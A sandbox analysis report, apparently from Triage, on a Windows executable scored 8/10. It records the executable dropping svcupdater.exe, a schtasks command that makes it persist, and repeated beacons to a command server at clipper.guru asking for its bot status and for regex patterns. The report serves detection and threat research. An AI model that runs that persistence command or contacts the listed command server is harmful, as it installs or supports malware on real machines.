876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04 | Triage

Analysis

max time kernel
291s
max time network
295s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
02/11/2022, 22:18 UTC

Sharing

Report Analysis Logs

General

Target

876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04.exe
Size

4.8MB
MD5

80750ddfb5cfe9eb8e2adac60f372534
SHA1

a720efe2b3ef7735efd77de698a5576b36068d07
SHA256

876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04
SHA512

bf4100fc99282c91ec03c8c234d320321e21e5e4120c45c2cd5cfeaffcf07d4e67143e61407b570448bea16b44ed0bf7ad720e61ca2ae5d30d804c5fc8266d6f
SSDEEP

49152:RAM2vrGxtRJHHc1RmqAhaShRgdGMYYqWxvdTBB0IEqYjla27EdS5g+A:mMgGxtU1RmqA3xsquvPEdZi+A

Score

8^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
3976	svcupdater.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

Scheduled Task

pid	Process
3996	schtasks.exe

GoLang User-Agent 5 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	4	Go-http-client/1.1
HTTP User-Agent header	7	Go-http-client/1.1
HTTP User-Agent header	8	Go-http-client/1.1
HTTP User-Agent header	10	Go-http-client/1.1
HTTP User-Agent header	11	Go-http-client/1.1

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2712 wrote to memory of 3512	2712	876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04.exe	66
PID 2712 wrote to memory of 3512	2712	876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04.exe	66
PID 3512 wrote to memory of 3996	3512	cmd.exe	68
PID 3512 wrote to memory of 3996	3512	cmd.exe	68

C:\Users\Admin\AppData\Local\Temp\876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04.exe
"C:\Users\Admin\AppData\Local\Temp\876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2712
- C:\Windows\system32\cmd.exe
  cmd.exe "/C schtasks /create /tn \kBqZwNWVQe /tr \"C:\Users\Admin\AppData\Roaming\kBqZwNWVQe\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3512
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn \kBqZwNWVQe /tr \"C:\Users\Admin\AppData\Roaming\kBqZwNWVQe\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
    3⤵
    - Creates scheduled task(s)
    PID:3996

C:\Users\Admin\AppData\Roaming\kBqZwNWVQe\svcupdater.exe
C:\Users\Admin\AppData\Roaming\kBqZwNWVQe\svcupdater.exe
1⤵
- Executes dropped EXE
PID:3976

Network

DNS

clipper.guru

svcupdater.exe

Remote address:

8.8.8.8:53

Request

clipper.guru

IN A

Response

clipper.guru

IN A

45.159.189.115
GET

http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

svcupdater.exe

Remote address:

45.159.189.115:80

Request

GET /bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 429 Too Many Requests

Server: nginx/1.18.0
Date: Wed, 02 Nov 2022 22:19:03 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 169
Connection: keep-alive
GET

http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

svcupdater.exe

Remote address:

45.159.189.115:80

Request

GET /bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 02 Nov 2022 22:19:03 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 803
Connection: keep-alive
GET

http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

svcupdater.exe

Remote address:

45.159.189.115:80

Request

GET /bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 429 Too Many Requests

Server: nginx/1.18.0
Date: Wed, 02 Nov 2022 22:20:04 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 169
Connection: keep-alive
GET

http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

svcupdater.exe

Remote address:

45.159.189.115:80

Request

GET /bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 02 Nov 2022 22:20:04 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 803
Connection: keep-alive
GET

http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

svcupdater.exe

Remote address:

45.159.189.115:80

Request

GET /bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 429 Too Many Requests

Server: nginx/1.18.0
Date: Wed, 02 Nov 2022 22:21:05 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 169
Connection: keep-alive
GET

http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

svcupdater.exe

Remote address:

45.159.189.115:80

Request

GET /bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 02 Nov 2022 22:21:05 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 803
Connection: keep-alive
DNS

clipper.guru

svcupdater.exe

Remote address:

8.8.8.8:53

Request

clipper.guru

IN A

Response

clipper.guru

IN A

45.159.189.115
GET

http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

svcupdater.exe

Remote address:

45.159.189.115:80

Request

GET /bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 429 Too Many Requests

Server: nginx/1.18.0
Date: Wed, 02 Nov 2022 22:22:06 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 169
Connection: keep-alive
GET

http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

svcupdater.exe

Remote address:

45.159.189.115:80

Request

GET /bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 02 Nov 2022 22:22:06 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 803
Connection: keep-alive
GET

http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

svcupdater.exe

Remote address:

45.159.189.115:80

Request

GET /bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 429 Too Many Requests

Server: nginx/1.18.0
Date: Wed, 02 Nov 2022 22:23:07 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 169
Connection: keep-alive
GET

http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

svcupdater.exe

Remote address:

45.159.189.115:80

Request

GET /bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 02 Nov 2022 22:23:07 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 803
Connection: keep-alive

40.79.189.58:443

322 B
7
45.159.189.115:80

http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

http

svcupdater.exe

679 B
1.6kB
7
6

HTTP Request

GET http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

HTTP Response

429

HTTP Request

GET http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

HTTP Response

200
45.159.189.115:80

http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

http

svcupdater.exe

679 B
1.6kB
7
6

HTTP Request

GET http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

HTTP Response

429

HTTP Request

GET http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

HTTP Response

200
45.159.189.115:80

http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

http

svcupdater.exe

679 B
1.6kB
7
6

HTTP Request

GET http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

HTTP Response

429

HTTP Request

GET http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

HTTP Response

200
45.159.189.115:80

http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

http

svcupdater.exe

725 B
1.6kB
8
7

HTTP Request

GET http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

HTTP Response

429

HTTP Request

GET http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

HTTP Response

200
45.159.189.115:80

http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

http

svcupdater.exe

587 B
1.5kB
5
4

HTTP Request

GET http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

HTTP Response

429

HTTP Request

GET http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

HTTP Response

200

8.8.8.8:53

clipper.guru

dns

svcupdater.exe

58 B
74 B
1
1

DNS Request

clipper.guru

DNS Response

45.159.189.115
8.8.8.8:53

clipper.guru

dns

svcupdater.exe

58 B
74 B
1
1

DNS Request

clipper.guru

DNS Response

45.159.189.115

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\kBqZwNWVQe\svcupdater.exe

Filesize
4.8MB

MD5
80750ddfb5cfe9eb8e2adac60f372534

SHA1
a720efe2b3ef7735efd77de698a5576b36068d07

SHA256
876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04

SHA512
bf4100fc99282c91ec03c8c234d320321e21e5e4120c45c2cd5cfeaffcf07d4e67143e61407b570448bea16b44ed0bf7ad720e61ca2ae5d30d804c5fc8266d6f

Download Submit
C:\Users\Admin\AppData\Roaming\kBqZwNWVQe\svcupdater.exe

Filesize
4.8MB

MD5
80750ddfb5cfe9eb8e2adac60f372534

SHA1
a720efe2b3ef7735efd77de698a5576b36068d07

SHA256
876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04

SHA512
bf4100fc99282c91ec03c8c234d320321e21e5e4120c45c2cd5cfeaffcf07d4e67143e61407b570448bea16b44ed0bf7ad720e61ca2ae5d30d804c5fc8266d6f

Download Submit